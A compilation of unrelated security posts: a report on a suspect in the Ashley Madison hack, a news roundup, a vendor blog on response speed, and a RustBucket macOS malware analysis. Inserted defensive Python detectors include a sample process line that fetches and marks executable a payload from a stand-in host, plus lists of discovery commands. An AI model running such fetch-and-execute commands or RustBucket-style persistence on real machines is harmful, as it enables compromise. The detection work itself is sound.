Top Suspect in 2015 Ashley Madison Hack Committed Suicide in 2014

When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users, the company’s then-CEO Noel Biderman was quick to point the finger at an unnamed former contractor. But as a new documentary series on Hulu reveals [SPOILER ALERT!], there was just one problem with that theory: Their top suspect had killed himself more than a year before the hackers began publishing stolen user data.

The new documentary, The Ashley Madison Affair, begins airing today on Hulu in the United States and on Disney+ in the United Kingdom. The series features interviews with security experts and journalists, Ashley Madison executives, victims of the breach and jilted spouses.

The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock, a data scientist who worked with the show’s producers at the Warner Bros. production company Wall to Wall Media. Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015.

Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach. That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti-Semitic and far-right groups online in the months leading up to the hack.

Whoever hacked Ashley Madison had access to all employee emails, but they only released Biderman’s messages — three years’ worth. Apropos of my retrospective report, Bullock found that a great many messages in Biderman’s inbox were belligerent and anti-Semitic screeds from a former Ashley Madison employee named William Brewster Harrison.

William Harrison’s employment contract with Ashley Madison parent Avid Life Media.

The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online, but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service.

There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison.

Ashley Madison’s parent company — Toronto-based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner. But after being informed that Bradshaw was not subject to Canadian trademark laws, Avid Life offered to buy AshleyMadisonSucks.com for $10,000.

When Bradshaw refused to sell the domain, he and his then-girlfriend were subject to an unrelenting campaign of online harassment and blackmail. It now appears those attacks were perpetrated by Harrison, who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw, his then-girlfriend and their friends.

[As the documentary points out, the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison, which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy].

Harrison even went after Bradshaw’s lawyer and wife, listing them both on a website he created called Contact-a-CEO[.]com, which Harrison used to besmirch the name of major companies — including several past employers — all entities he believed had slighted him or his family in some way. The site also claimed to include the names, addresses and phone numbers of top CEOs.

A cached copy of Harrison’s website, contact-the-ceo.com.

An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash-a-Business[.]com, which Harrison dedicated to “all those sorry ass corporate executives out there profiting from your hard work, organs, lives, ideas, intelligence, and wallets.” Copies of the site at archive.org show it was the work of someone calling themselves “The Chaos Creator.”

Will Harrison was terminated as an Ashley Madison employee in November 2011, and by early 2012 he’d turned his considerable harassment skills squarely against the company. Ashley Madison’s long-suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison’s internal systems suggesting that a large percentage of the female accounts on the service were computer-operated bots.

Ashley Madison’s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online. In one exchange on Aug. 16, 2012, Ashley Madison’s director of IT was asked to produce a list of all company employees with all-powerful administrator access.

“Who or what is asdfdfsda@asdf.com?,” Biderman asked, after being sent a list of nine email addresses.

“It appears to be the email address Will used for his profiles,” the IT director replied.

“And his access was never shut off until today?,” asked the company’s general counsel Mike Dacks.

A Biderman email from 2012.

What prompted the data scientist Bullock to reach out were gobs of anti-Semitic diatribes from Harrison, who had taken to labeling Biderman and others “greedy Jew bastards.”

“So good luck, I’m sure we’ll talk again soon, but for now, I’ve got better things in the oven,” Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated. “Just remember I outsmarted you last time and I will outsmart and out maneuver you this time too, by keeping myself far far away from the action and just enjoying the sideline view, cheering for the opposition.”

A 2012 email from William Harrison to former Ashley Madison CEO Noel Biderman.

Harrison signed his threatening missive with the salutation, “We are legion,” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers.

The leaked Biderman emails show that Harrison made good on his threats, and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti-Semitic language.

But on Mar. 5, 2014, Harrison committed suicide by shooting himself in the head with a handgun. This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed.

Does Harrison’s untimely suicide rule him out as a suspect in the 2015 hack? Who is The Chaos Creator, and what else transpired between Harrison and Ashley Madison prior to his death? We’ll explore these questions in Part II of this story, to be published early next week.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

The Good | Authorities Arrest Alleged Ringleader of Major Cybercrime Organization

After pocketing as much as $30 million in stolen funds over the course of four years, a suspected senior member of the OPERA1ER cybercrime organization has been arrested in Côte d’Ivoire. The arrest was carried out as part of Interpol’s Operation Nervone with cooperation across local and international law enforcement agencies as well as cybersecurity researchers.

OPERA1ER, aka BlueBottle, NX$M$, DESKTOP Group, or Common Raven, is infamous for over 30 attacks spanning 15 countries in Africa, Asia, and Latin America. According to Interpol, they are a highly mature criminal organization focused on targeting financial institutions and mobile banking services with mass business email compromise (BEC) and malware campaigns.

Source: Group-IB

Recent reporting shows that BEC scams continue to soar. These scams are a sophisticated form of cyber fraud in which attackers impersonate legitimate business email accounts to deceive recipients into initiating fraudulent transactions or disclosing sensitive information. Last year alone, the FBI’s Internet Crime Complaint Center (IC3) received over 20,000 BEC-related complaints with adjusted losses of over $2.7 billion.

OPERA1ER gains initial access through well-crafted spear phishing emails that deliver remote access trojans (RATs), keyloggers, and password stealers. In previous attacks, OPERA1ER’s emails were written in French and often reused tax office and job offer language. After breaking in, the group is known to use tools such as Cobalt Strike and Metasploit to establish persistence.

The success of Operation Nervone is the result of extensive collaboration between law enforcement agencies and the cybersecurity researchers at Orange-CERT-CC and Group-IB, who first published a report on OPERA1ER late last year. The operation demonstrates the importance of exchanging threat intelligence and working collectively to take down high-profile, organized cybercrime syndicates.

The Bad | High-Severity Vulnerability In Cisco Switches Allows Attackers to Modify Encrypted Traffic

Cisco has issued a security advisory this week warning customers about a new, high severity vulnerability allowing attackers to tamper with encrypted traffic in some data center switches.

Identified as CVE-2023-20185, the vulnerability was found during internal security testing and affects Cisco Nexus 9332C and 9364C switches, and Cisco Nexus 9500 spine switches equipped with a Cisco Nexus N9K-X9736C-FX line card, when they are running ACI mode switch software release 14.0 or later and have the CloudSec encryption feature enabled. ACI mode is most commonly used in data centers to control both physical and virtual networks.

Source: Cisco Security

The vulnerability stems from a flaw in the implementation of the ciphers used by the CloudSec encryption feature on affected switches. An attacker positioned to intercept intersite traffic could use cryptanalytic techniques to break the encryption between two ACI sites.

If exploited, an unauthenticated remote attacker could read or modify intersite encrypted traffic between the remote sites. Further, successful exploitation could give adversaries access to data that allows them to move laterally across the compromised network.

So far, Cisco’s Product Security Incident Response Team (PSIRT) says it is not aware of any active exploitation or public proof of concept (PoC) code targeting the vulnerability. However, Cisco has not yet released software updates that address it. This is a developing situation; in the meantime, customers can reduce the risk of unauthorized access and data manipulation by disabling the ACI multi-site CloudSec encryption feature and contacting Cisco support to discuss alternative options.

The Ugly | BlackCat Ransomware Runs Malvertising Campaigns By Cloning Popular File Transfer App

This week, cybersecurity researchers uncovered several malvertising campaigns designed to spread malware-laden installers to unsuspecting WinSCP users. WinSCP is an open-source and free SFTP, FTP, WebDAV, S3 and SCP client, and file manager for Windows that boasts over 201 million downloads and counting. The campaign has since been attributed to the notorious BlackCat ransomware group (aka ALPHV).

Malvertising (malicious advertising) is delivered through legitimate online advertising networks and platforms. These advertisements appear as regular ads on websites, but contain malicious links and code that infects users’ devices with malware. Upon interaction, users are redirected to attacker-controlled websites or prompted to download the malware. Malvertising takes advantage of the trust placed in reputable brands and advertising networks, making it difficult for users to identify the threat.

In the recent BlackCat campaigns, the group used WinSCP specifically to lure IT professionals and web and systems administrators, seeking initial access to valuable target networks. Researchers discovered ads promoting fake WinSCP sites on both Google and Bing search pages. The spoofed sites, hosted on domain names very similar to the real WinSCP website, prompted visitors to download the app. Further interaction then installed a trojanized DLL containing a Cobalt Strike beacon that connected to a C2 server.

Source: Trend Micro

Attacks due to malvertising continue to increase, and have recently been seen spreading a new macOS variant of Atomic Stealer, stealing AWS logins, and distributing virtualized .NET malware loaders. Businesses can reduce their exposure to malvertising by using firewall controls and web filters to block access to known malicious websites, deploying ad-blocking software so that ads are not displayed, and deploying endpoint protection software to prevent and detect the execution of malicious code delivered through malicious adverts.

Cybersecurity In The Fast Lane | Why Speed Is Key In Incident Response & Mitigation

Threat actors are constantly evolving, continually developing the tactics, techniques, and procedures (TTPs) they use in attacks. In today’s threat landscape, enterprises of all sizes and industries find themselves pitted against professional cybercriminal gangs, advanced persistent threat (APT) groups, and even nation-state actors – all of whom are leveraging faster attack methods than ever before.

In addition to sophisticated TTPs and the organization behind many cybercrime-as-a-service models, enterprises also face the reality of how quickly an active threat can become a full-blown incident. Speed, in both defense and attack, is the key metric to watch, because it determines whether the attacker or the defender succeeds.

This blog discusses the metric of speed in context of modern threat actors, their methods, and how enterprise security teams can shave off critical seconds and minutes in their own detection and response processes.

Threat Actors Are Picking Up Their Speed

Technology has changed dramatically in the last few years alone, becoming smarter, faster, and more advanced. While enterprises use the latest software and tools to further their businesses, threat actors have done the same to level up their attack methods.

Ransomware Attacks

Consider one of the most significant takeaways from Mandiant’s latest M-Trends report: the global median dwell time – the time between the start of an intrusion and the moment it is identified – is dropping year over year. At a median of just 16 days for 2022, this may look like a positive development, since threat actors are spending less time inside a system after entry. However, the skyrocketing number of ransomware attacks on global businesses is a good indication of why median dwell times are declining.

Though some of the reduction in dwell time is attributed to improved detection and response capabilities, ransomware has become a digital pandemic, targeting victims in every industry vertical. Given its high earning potential for a relatively short attack time frame, ransomware is highly lucrative for threat actors, and security experts project that attacks will continue to rise in both frequency and severity.

Drive-By Download Attacks

As their name suggests, drive-by downloads are stealthy, fast, and often complete before the victim even knows what is happening. This type of attack infects a victim’s device with malware without their knowledge or consent. It typically occurs when the victim visits a compromised website or clicks a malicious link embedded in an email or advertisement.

The attack then takes advantage of vulnerabilities in web browsers, plugins, or operating systems, allowing the malware to be automatically downloaded and executed on the victim’s device. Drive-by downloads require only the bare minimum of a victim’s interaction, making them a potent tool for spreading malware, stealing sensitive information, and gaining unauthorized access to systems.

Mass Scanning For Vulnerabilities

Recent research shows that defenders face a real race against the clock to patch new vulnerabilities: threat actors begin mass, internet-wide scans for vulnerable endpoints within just 15 minutes of a new CVE being disclosed. Threat actors consistently monitor vendor bulletins and software update channels for the latest vulnerability announcements and proofs of concept that they can use in their next attack. Oftentimes, these fresh vulnerabilities give them remote code execution (RCE) and access to corporate networks.

Patch management is a continuous and, for many organizations, arduous task that requires security teams to keep up with the latest security issues across many operating systems and applications. Since performing these internet-wide scans does not require a deep skill set, even low-level criminals can take advantage, sometimes selling their scan results to more experienced actors.

Zero-Day Exploits

Threat actors are getting faster at exploiting zero-days. In a recent Vulnerability Intelligence Report, researchers cited time-to-exploit as the critical metric for security practitioners. Over the past three years, the time between disclosure and known exploitation has decreased steadily: 30% of vulnerabilities were exploited in the wild within one week of disclosure in 2020, rising to 56% in 2022. Zero-days are most often exploited to provide initial access for ransomware gangs.

Growing Availability of Off-The-Shelf-Tools

Apart from APT groups, full-fledged ransomware gangs, and nation-backed threat actors, low-level cybercriminals are taking their shot on enterprises due to the widening availability of ready-to-use hacking tools. These tools, including exploit kits, infostealers, scanners, password crackers, and attack simulation tools, are commonly available on forums and darknet markets and significantly lower the barrier to launching serious cyberattacks.

As the market for selling pre-made tools continues to expand, cybercriminals with little to no technical expertise are now able to quickly find and purchase pre-existing scripts to launch attacks on computer systems and networks.

Deciphering How Actors Move Across The Cyber Attack Lifecycle

Though cyber threat actors are moving swiftly, there are ways for enterprises to stay ahead and safeguard their critical data and systems. Understanding how actors maneuver before and during their attacks allows defenders to put the right safeguards in place.

  • Planning Phase – Before the attack, threat actors select their target and work to identify exploitable aspects of its operations: low-hanging fruit such as unpatched vulnerabilities, misconfigurations, administrative users on unprotected devices, and more.
  • Initial Intrusion – Based on the findings from the planning phase, threat actors tailor their intrusion technique based on the weaknesses of their victims.
  • Enumeration Phase – Once inside, threat actors move fast to situate themselves within the system, understand the limits of their current permissions, and establish an estimate on what privileges they require to start moving laterally. Time is of the essence in this phase as actors start to establish their foothold and upgrade their access.
  • Lateral Movement – Using the credentials and privileges they have gained, the actors spread deeper into the affected environment. Here, their main goal is to distribute their malware and toolset, exfiltrating and encrypting data as they go.
  • Objective Completion – After deleting or corrupting backups and local files, actors prepare to ransom their victim.

Based on the cyberattack lifecycle, the intrusion and enumeration phases open up a critical window for proactive action by cyber defenders. During these initial stages, the attackers have not yet deeply infiltrated the compromised network or blended in with normal network traffic. If a threat actor manages to make it to the lateral movement phase, detection becomes much more challenging. Threat actors use evasion tactics to avoid detection, embedding themselves deeply within the network. Living-off-the-land techniques are most often used in this phase, leveraging legitimate processes and tools already present in the environment to strengthen their foothold.

Since the time span between intrusion and lateral movement is rapidly shrinking as threat actors become more sophisticated and well-equipped, the primary goal for cyber defenders is to focus on detecting the first signs of compromise during the enumeration phase and isolating the threat before it can cause significant damage.
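As an added example (not SentinelOne’s detection logic or any product rule), the following Python script sketches the kind of enumeration-phase check the paragraph above calls for: it reads process-creation telemetry and alerts when one host runs several discovery commands within a short window, which is exactly the burst of whoami/net/nltest activity that precedes lateral movement. The pipe-delimited log format, the sample events, the command list and the thresholds are all constructed assumptions; tune them to your own EDR telemetry.

```python
"""Discovery-burst detector for process-creation telemetry.

Added example, not SentinelOne's rule logic. The pipe-delimited log format,
the sample events, the command list and the thresholds are all assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Host and domain discovery commands typically run right after initial access.
# Each pattern is anchored to the start of the command line.
DISCOVERY_PATTERNS = [
    r"whoami(\.exe)?\b",
    r"net1?(\.exe)?\s+(user|group|localgroup|view)\b",
    r"nltest(\.exe)?\b",
    r"systeminfo(\.exe)?\b",
    r"ipconfig(\.exe)?\s+/all\b",
    r"quser(\.exe)?\b",
    r"dsquery(\.exe)?\b",
    r"nslookup(\.exe)?\b",
]
DISCOVERY_RE = re.compile("^(?:" + "|".join(DISCOVERY_PATTERNS) + ")", re.IGNORECASE)

# Constructed sample telemetry: timestamp|host|user|parent image|command line.
SAMPLE_EVENTS = """\
2023-07-03T09:14:02Z|WS-0142|corp\\jdoe|outlook.exe|whoami /all
2023-07-03T09:14:05Z|WS-0142|corp\\jdoe|cmd.exe|net user jdoe /domain
2023-07-03T09:14:09Z|WS-0142|corp\\jdoe|cmd.exe|net group "domain admins" /domain
2023-07-03T09:14:15Z|WS-0142|corp\\jdoe|cmd.exe|nltest /dclist:corp
2023-07-03T09:14:21Z|WS-0142|corp\\jdoe|cmd.exe|ipconfig /all
2023-07-03T09:30:00Z|WS-0077|corp\\asmith|powershell.exe|ipconfig /all
2023-07-03T11:02:44Z|WS-0077|corp\\asmith|explorer.exe|notepad.exe C:\\notes.txt
"""


def parse_events(text):
    """Parse pipe-delimited process-creation records into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, parent, cmd = line.split("|", 4)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "host": host,
            "user": user,
            "parent": parent,
            "cmd": cmd,
        })
    return events


def is_discovery(cmd):
    """True if the command line starts with a known discovery command."""
    return DISCOVERY_RE.search(cmd.strip()) is not None


def detect_bursts(events, window_seconds=120, threshold=4):
    """Return one alert per host whose discovery commands, sorted by time,
    reach `threshold` within any sliding window of `window_seconds`."""
    window = timedelta(seconds=window_seconds)
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_discovery(ev["cmd"]):
            by_host[ev["host"]].append(ev)

    alerts = []
    for host, evs in by_host.items():
        best = None  # (count, start_index, end_index) of the densest window
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until the window fits.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if best is None or count > best[0]:
                best = (count, start, end)
        count, s, e = best
        if count >= threshold:
            alerts.append({
                "host": host,
                "users": sorted({ev["user"] for ev in evs[s:e + 1]}),
                "count": count,
                "first": evs[s]["ts"],
                "last": evs[e]["ts"],
                "commands": [ev["cmd"] for ev in evs[s:e + 1]],
                # Discovery launched from a mail client or browser is a
                # stronger signal than the same command typed by an admin.
                "parents": sorted({ev["parent"] for ev in evs[s:e + 1]}),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(parse_events(SAMPLE_EVENTS)):
        span = (alert["last"] - alert["first"]).seconds
        print(f"{alert['host']}: {alert['count']} discovery commands in "
              f"{span}s, parents={alert['parents']}")
```

Run on the constructed sample, the script fires once for WS-0142 (five discovery commands in 19 seconds, the first one launched from outlook.exe) and stays quiet for WS-0077, whose single ipconfig is normal admin activity. The sliding window is what makes the rule useful: a single whoami is noise, but the same commands packed into two minutes from one host are the enumeration phase the paragraph describes.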

Autonomous Tools Take the Toil Out of Triage

Managing such a challenge, however, is often beyond the resources of a security team tasked with manual triage of a flood of alerts and uncontextualized event data. That’s why autonomous, AI-powered EDR and XDR solutions are the new go-to tools for analysts, threat hunters and incident responders alike.

A modern security tool like SentinelOne Singularity not only autonomously deals with known malware threats – from detection right through to mitigation and even rollback in the case of a ransomware attack that gets through – but also provides incident responders with contextualized data to tackle targeted attacks.

With automated contextual enrichment from tools such as Singularity XDR, IR teams can take advantage of insights from aggregated event information that combines all related data gathered from multiple tools and services into a single ‘incident’, without adding extra tools or more people. Out-of-the-box integrations and pre-tuned detection mechanisms across the security stack help improve productivity, threat detection, and forensics.

SentinelOne Vigilance Respond | Our Approach to Managed Detection & Response (MDR)

While powerful, such tools can be supplemented by Managed Detection and Response services for an even higher level of security. Organizations across the globe rely on SentinelOne’s Managed Detection and Response (MDR) service, Vigilance Respond, to stop threat actors from reaching the lateral movement stage in attacks. Utilizing SentinelOne Singularity, Vigilance Respond defends networks against cyberattacks instantly and monitors customer environments 24/7/365, hunting for advanced threats and providing faster mean-time-to-response (MTTR) rates.

Vigilance Respond works by providing machine-speed detection technology run by dedicated analysts working around-the-clock. It also allows organizations to adapt instantly, and at scale, in today’s ever-shifting threat landscape, closing the gap between intrusion and lateral movement and neutralizing the threat actor before they can begin to spread deep into a target’s systems.

Vigilance Respond offers these services to ensure businesses are safeguarded:

  • Active threat campaign hunting for APTs
  • Alerting and remediation guidance for emerging threats
  • Incident-based triage and hunting
  • 24/7/365 monitoring, triage, and response
  • Security Assessment (Vigilance Respond Pro)
  • Digital Forensics Investigation & Malware Analysis (Vigilance Respond Pro)

Conclusion

In the realm of cybersecurity, speed matters. It can be the deciding factor between successfully thwarting an attack or suffering substantial damage. As technology evolves and threat actors become more adept at exploiting vulnerabilities, enterprise leaders are investing in strategies focused on swift and proactive cybersecurity response measures.

Ultimately, speed in cybersecurity is about staying one step ahead of the adversaries. It requires a proactive approach, continuous monitoring, and real-time threat intelligence. By prioritizing speed, organizations can enhance their ability to detect, respond to, and mitigate cyber threats, ensuring a stronger and more resilient security posture.

Learn more about how SentinelOne Singularity and Vigilance Respond can help safeguard your business by contacting us or requesting a demo.


BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

Back in April, researchers at JAMF detailed a sophisticated APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on infected devices. ‘RustBucket’, as they labeled it, was attributed with strong confidence to the BlueNoroff APT, generally assumed to be a subsidiary of the wider DPRK cyber attack group known as Lazarus.

In May, ESET tweeted details of a second RustBucket variant targeting macOS users, followed in June by Elastic’s discovery of a third variant that included previously unseen persistence capabilities.

RustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages of the malware. In this post, we review the multiple malware payloads used in the campaign and highlight the novel techniques RustBucket deploys to evade analysis and detection.

RustBucket Stage 1 | AppleScript Dropper

The attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled AppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user interface and function merely as a convenient way for developers to distribute AppleScripts to users.

The threat actors chose not to save the script as run-only, which allows us to easily decompile the script with the built-in osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).

Stage 1 executes three ‘do shell script’ commands to set up Stage 2

The script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called Internal PDF Viewer. We will not repeat the details here, as previous researchers have already described them thoroughly.

Stage 1 writes the second stage to the /Users/Shared/ folder, which does not require permissions and is accessible to malware without having to circumvent TCC. The Stage 1 variant described by Elastic differs in that it writes the second stage as a hidden file to /Users/Shared/.pd.

Stage 1 is by far the least sophisticated and most easily detected part of the attack chain. The arguments of the do shell script commands should appear in the Mac’s unified logs and in the output of command line tools such as the ps utility.

The success of Stage 1 relies heavily on how well the threat actor executes the social engineering. In the case described by JAMF, the threat actors used an elaborate ruse, requiring an “internal” PDF reader to read a supposedly confidential or ‘protected’ document. Victims had to execute Stage 1 believing it capable of reading the PDF they had received. In fact, Stage 1 was only a dropper, designed to protect Stage 2 should anyone without the malicious PDF stumble on it.
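Because the do shell script arguments surface in ps output, the dropper chain can be hunted from a process snapshot. The Python below is an added example (not the malware’s code and not a SentinelOne detection): it parses a ps-style listing, walks each shell’s ancestry, and flags sh -c children of an AppleScript applet, noting whether the command stages a file into /Users/Shared as the Elastic variant does. The snapshot is constructed; it assumes the column order of ps -axo pid,ppid,comm,args and that the applet’s executable is named applet, as Script Editor exports it. The download URL is a placeholder.

```python
"""Flag `sh -c` commands spawned by an AppleScript applet, the shape of the
RustBucket Stage 1 dropper, using a `ps`-style process snapshot.

Added example, not the malware's or SentinelOne's code. The snapshot below is
constructed; it assumes the column order of `ps -axo pid,ppid,comm,args` and
that the applet's executable is named `applet`, as Script Editor exports it.
"""
import re

SAMPLE_PS = """\
  PID  PPID COMM             ARGS
    1     0 launchd          /sbin/launchd
  412     1 Finder           /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder
  903   412 applet           /Users/hero/Downloads/Internal PDF Viewer.app/Contents/MacOS/applet
  917   903 sh               sh -c curl -o /Users/Shared/.pd http://example.invalid/pd; chmod +x /Users/Shared/.pd
  918   903 sh               sh -c /Users/Shared/.pd
  950   412 Terminal         /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
  961   950 zsh              -zsh
  962   961 sh               sh -c ls /Users/Shared
"""

# An applet binary, or osascript run directly, as the shell's ancestor.
APPLET_RE = re.compile(r"/Contents/MacOS/applet$|^osascript$")
# Staging into the TCC-free /Users/Shared folder, or fetching/marking executable.
STAGING_RE = re.compile(r"/Users/Shared/|\bcurl\s|\bchmod\s")


def parse_ps(text):
    """Parse `ps -axo pid,ppid,comm,args` output into {pid: proc}."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        args = parts[3] if len(parts) == 4 else ""
        procs[pid] = {"pid": pid, "ppid": ppid, "comm": comm, "args": args}
    return procs


def ancestors(procs, pid):
    """Yield parent, grandparent, ... until launchd or an unknown pid."""
    seen = set()
    ppid = procs[pid]["ppid"]
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        yield procs[ppid]
        ppid = procs[ppid]["ppid"]


def find_applet_shells(procs):
    """Return `sh -c` processes whose ancestry includes an applet or
    osascript, noting whether the command stages into /Users/Shared."""
    findings = []
    for proc in procs.values():
        shell = proc["comm"]
        if shell not in ("sh", "bash", "zsh") or not proc["args"].startswith(f"{shell} -c "):
            continue
        applet = next(
            (a for a in ancestors(procs, proc["pid"])
             if APPLET_RE.search(a["args"]) or APPLET_RE.search(a["comm"])),
            None,
        )
        if applet is None:
            continue  # an interactive shell, not a do shell script child
        findings.append({
            "pid": proc["pid"],
            "applet": applet["args"],
            "command": proc["args"][len(shell) + 4:],  # strip "<shell> -c "
            "stages_shared": STAGING_RE.search(proc["args"]) is not None,
        })
    return findings


if __name__ == "__main__":
    # On a live host, feed it: subprocess.check_output(["ps", "-axo", "pid,ppid,comm,args"], text=True)
    for f in find_applet_shells(parse_ps(SAMPLE_PS)):
        print(f"pid {f['pid']} under {f['applet']!r}: {f['command']} "
              f"(stages into /Users/Shared: {f['stages_shared']})")
```

On the constructed snapshot only pids 917 and 918 are reported: both are sh -c children of the applet and both touch /Users/Shared. The ls /Users/Shared typed in Terminal (pid 962) is not reported, because its ancestry runs through zsh and Terminal rather than an applet, which is the distinction that keeps this check from paging on ordinary admin use of the shared folder.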

RustBucket Stage 2 | Payloads Written in Swift and Objective-C

We have found a number of different Stage 2 payloads, some written in Swift and some in Objective-C, all compiled for both Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary; the universal ‘fat’ binaries range between 160KB and 210KB.

Samples of RustBucket Stage 2 vary in size

Across the samples, various username strings can be found. Those we have observed in Stage 2 binaries so far include:

/Users/carey/
/Users/eric/
/Users/henrypatel/
/Users/hero/

Despite the differences in size and code artifacts, the Stage 2 payloads share the task of retrieving Stage 3 from the command and control server. The Stage 2 payload requires a specially crafted PDF to unlock the code path that downloads Stage 3; the PDF supplies an XOR’d key used to decode the obfuscated C2 address appended to the end of the PDF.

In some variants, this download is performed in the downAndExecute function described by previous researchers; in others, it is performed in the aptly named down_update_run function. The implementation of this function varies across samples. In b02922869e86ad06ff6380e8ec0be8db38f5002b, for example, it runs a hardcoded command via system().

Stage 2 executes a shell command via the system() call to retrieve and run Stage 3

However, the same function in other samples (e.g., d5971e8a3e8577dbb6f5a9aad248c842a33e7a26) uses NSURL APIs and entirely different logic.

Code varies widely among samples, possibly suggesting different developers

Researchers at Elastic further noted that in one newer Stage 2 variant written in Swift, the User-Agent string is all lowercase, whereas in the earlier Objective-C samples it is not.

User-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2

The User-Agent value is simply a string, and nothing in HTTP requires a particular case, but if this was a deliberate change it is possible the threat actors parse the User-Agent on the server side to weed out unwanted requests to the C2.

In the most recent samples, the payload retrieved by Stage 2 is written to disk as “ErrorCheck.zip” in _CS_DARWIN_USER_TEMP (i.e., $TMPDIR, typically under /var/folders/…/../T/) before being executed on the victim’s device.

RustBucket Stage 3 | New Variant Drops Persistence LaunchAgent

The Stage 3 payload has so far been seen in two distinct variants:

  • A: 182760cbe11fa0316abfb8b7b00b63f83159f5aa Stage3
  • B: b74702c9b82f23ebf76805f1853bc72236bee57c ErrorCheck, System Update

Both variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both. Notably, variant B does away with the webT class seen in variant A for gathering environmental information and checking for execution in a virtual machine via querying the SPHardwareDataType value of system_profiler.

The webT class appears in variant A of the Stage 3 payload

However, variant B has not scrubbed all webT artifacts from the code, and a reference to the missing module can still be found in the strings.

18070 0x0032bdf4 0x10032bdf4 136 137 ascii /Users/carey/Dev/MAC_DATA/MAC/Trojan/webT/target/x86_64-apple-darwin/release/deps/updator-7a0e7515c124fac6.updator.ab9d0eaa-cgu.0.rcgu.o

A string referencing the missing webT module can still be found in Stage 3 variant B

The substring “Trojan”, which does not appear in earlier variants, is also found in the file path referenced by the same string.

Importantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update and serves as the target executable of the LaunchAgent.

Since the Stage 3 payload requires a URL as a launch parameter, one is provided in the property list as a Program Argument. Curiously, the URL passed to ErrorCheck on launch is appended to this hardcoded URL in the LaunchAgent plist.

RustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch

Appending the supplied value to the hardcoded URL can be clearly seen in the code, though whether this is an error or accounted for in the way the string is parsed by the binary we have yet to determine.
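
The persistence described above leaves traits a defender can check for on any Mac: a LaunchAgent whose Label squats on Apple's com.apple. namespace while the program it runs lives in the user's home, an executable under ~/Library/Metadata, and a URL handed to the program as a launch argument. The following triage script is an added example, not SentinelOne's or the malware's code; the sample plist is constructed from the paths the post reports (the URL in it is a placeholder), and the scan_launch_agents helper simply applies the same checks to a real ~/Library/LaunchAgents directory.

```python
from __future__ import annotations

import plistlib
from pathlib import Path
from urllib.parse import urlsplit

# Locations a genuinely Apple-labelled agent would be expected to execute from.
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")


def triage_launch_agent(plist_bytes: bytes, plist_path: str) -> list[str]:
    """Return the suspicious traits found in one LaunchAgent plist (empty = clean)."""
    findings: list[str] = []
    plist = plistlib.loads(plist_bytes)  # handles both XML and binary plists
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    program = str(plist.get("Program") or (args[0] if args else ""))

    # RustBucket squats on Apple's label namespace but runs from the user's home.
    if label.startswith("com.apple.") and not program.startswith(APPLE_PROGRAM_PREFIXES):
        findings.append(f"Apple-style label {label!r} runs non-system program {program!r}")

    # The file name should be <Label>.plist; a mismatch is a common hand-written tell.
    if label and Path(plist_path).name != f"{label}.plist":
        findings.append(f"file name {Path(plist_path).name!r} does not match Label {label!r}")

    # ~/Library/Metadata holds Spotlight data, not executables.
    if "/Library/Metadata/" in program:
        findings.append(f"program lives under Library/Metadata: {program!r}")

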